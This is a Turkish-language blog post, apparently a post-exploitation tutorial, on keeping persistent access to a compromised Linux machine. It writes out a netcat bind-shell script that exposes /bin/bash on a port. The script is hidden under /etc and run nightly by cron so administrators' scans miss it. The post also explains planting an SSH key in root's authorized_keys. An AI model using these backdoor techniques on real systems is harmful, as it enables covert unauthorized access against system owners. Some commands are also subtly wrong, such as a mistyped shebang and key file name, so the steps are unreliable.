Press "Enter" to skip to content

Linux İşletim Sistemleri Üzerinde Kalıcı Olma Teknikleri

0

Merhaba,
Daha önceki yazımda Linux İşletim Sistemleri Üzerinde Yetki Yükseltme Teknikleri‘ni anlatmıştım. Bu yazımda ise Post Exploitation devamı olarak girdiğimiz bir sistemde nasıl kalıcı olacağımızı teknikler halinde anlatacağım.

1) Netcat Port Açarak

Bu yöntem sayesinde sistemden silinsek dahi girebileceğimiz bir açık kapı bırakıyoruz diyebiliriz. Bu kapıya sistemden atılsakta bağlanıp yeniden kullanıcı açabilmekteyiz. Fakat bu tekniğin bir dezavantajı var. Oda bu kapıya başka kötü niyetli kişilerinde bağlanabilecek olması. Bu sebepten dolayı kapımızın belirli saatlerde açılmasını sağlamalıyız ve o saatlerde bağlantı sağlamalıyız. Bağlantıyı kestiğimizde ise kapıda otomatik olarak kapanmalıdır. Bu sayede hem başka kişilerin bağlanmasını önlemiş oluruz, hemde sistem yöneticilerinin olası bir ağ taraması sonucu açık kapımızı görmemelerini sağlamış olacağız.

Peki nasıl yaparız?

Öncelikle Netcat arka kapımızı açacak olan komutu (*.sh) uzantısı şeklinde bir metin belgesinin içine yazıyoruz. Daha sonra içine;

!#/bin/bash
nc -l -v -p 8888 -e /bin/bash

Yazıyoruz. 8888 olan kısım bizim açılacak olan port numaramız. Bu numarayı kendinize göre düzenleyebilirsiniz. Daha sonra bu scripti saklıyoruz. Ör /etc/ altında klasör açıp içine atabilirsiniz.
Ben bu örnekte /etc/meta/ altında saklayıp işleme devam edeceğim.

Daha sonra bu scriptimizi günün belirli saatinde çalıştıracak ( Ben bu örnekte her gece yarısı olarak baz alacağım ) Schedule Tasks ayarını yapalım.
Bunun için terminalimize crontab -e komutunu yazıyoruz. Karşımıza çıkan seçeneklerden hangisinde <— easiest yazıyorsa onun numarasını yazıyoruz. Ekte görüldüğü gibi;

Daha sonra en alt satıra @midnight dosya_yolu şeklinde her gece yarısında verdiğimiz dosya yolundaki scripti çalıştırmasını sağlayacak kod satırını yazıyoruz. Crontab daha fazla seçenekleri için buradaki web siteden kullanım şekillerine ulaşabilirsiniz.

Bağlantı sağlayacağımız kapıyı her gece açtık. Peki kişisel oturumumuzdan nasıl bağlantı sağlayacağız? Terminale ekteki kodu yazarak bağlantıyı sağlayabilirsiniz:

nc -v baglanti_ıp_adresi port
Bu örnekte : nc -v 192.168.221.131 8888

 


Ektede görüldüğü gibi bağlantımız açıldı. Bundan sonra yazacağımız tüm komutlar hedef işletim sisteminde çalışacaktır. Eğer CTRL + C ile bağlantımızı kesersek bir sonraki gece yarısını beklemek zorunda kalacağız.

2) SSH Key Kullanarak Giriş Yapmak

Bu yöntem sayesinde kullanıcı adımız ve şifremiz olmasada, elimizde bulunan key ile sisteme giriş yapabilmekteyiz. Peki bu keyi nasıl oluşturacağız? Öncelikle root olduktan sonra
cd /root komutu ile root dizinine geliyoruz. Daha sonra ls -la komutu ile .ssh dosyamız var mı yokmu ona bakıyoruz.

Eğer yok ise aşağıdaki adımları izliyoruz:

1.Önce bir .ssh klasörü oluşturalı

mkdir ~/.ssh

2. Yetkileri ayarlayalım:

chmod 700 ~/.ssh

3. Authorized_keys Dosyasını oluşturalım:

touch ~/.ssh/authorized_keys

4. Authorized_keys Dosyasının yetkilerini ayarlayalım:

chmod 600 ~/.ssh/authorized_keys

*Doğru yetki vermek önemlidir, adım adım uygulayın aksi taktirde çalışmayacaktır. 5. SSH Keyimizi oluşturalım:

ssh-keygen -t rsa

6. Daha sonra oluşan keyimizi authorized_keys dosyamıza kopyalayalım:

cat ~/.ssh/id_rsa.pub >> ~/.ssh/auth_keys

Ekte’de görebilirsiniz :


Ve hepsi bu kadar. Artık elimizde bu sisteme ulaşabileceğimiz bir key var. Keyinizi .ssh klasörü altında id_rsa.pub içerisinden kopyalayabilirsiniz. Ayrıca authorized_keys dosyasının içeriğine bakarak keyinizin eklenmiş olduğunuda göreceksiniz. Bu keyi .ppk olarak kaydedip Putty’den giriş yapabilirsiniz.

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir